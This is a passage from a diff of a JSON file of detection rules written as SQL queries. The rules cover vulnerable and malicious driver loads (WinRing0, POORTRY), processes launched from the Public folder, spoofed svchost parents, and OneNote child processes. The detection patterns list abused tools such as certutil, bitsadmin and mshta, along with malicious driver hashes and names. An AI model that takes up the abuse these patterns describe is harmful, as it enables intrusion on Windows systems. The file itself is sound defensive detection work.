'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', 
'1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', 
'0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', 
'845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', 
'1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', '1E8B0C1966E566A523D652E00F7727D8B0663F1DFDCE3B9A09B9ADFAEF48D8EE', '2BBE65CBEC3BB069E92233924F7EE1F95FFA16173FCEB932C34F68D862781250', '30706F110725199E338E9CC1C940D9A644D19A14F0EB8847712CBA4CACDA67AB', '3124B0411B8077605DB2A9B7909D8240E0D554496600E2706E531C93C931E1B5', '38FA0C663C8689048726666F1C5E019FEAA9DA8278F1DF6FF62DA33961891D2A', '39CFDE7D401EFCE4F550E0A9461F5FC4D71FA07235E1336E4F0B4882BD76550E', '3D9E83B189FCF5C3541C62D1F54A0DA0A4E5B62C3243D2989AFC46644056C8E3', '3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 
'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', 
'58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', 
'552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', 
'478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', 
'1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', 
'2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver 
often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE 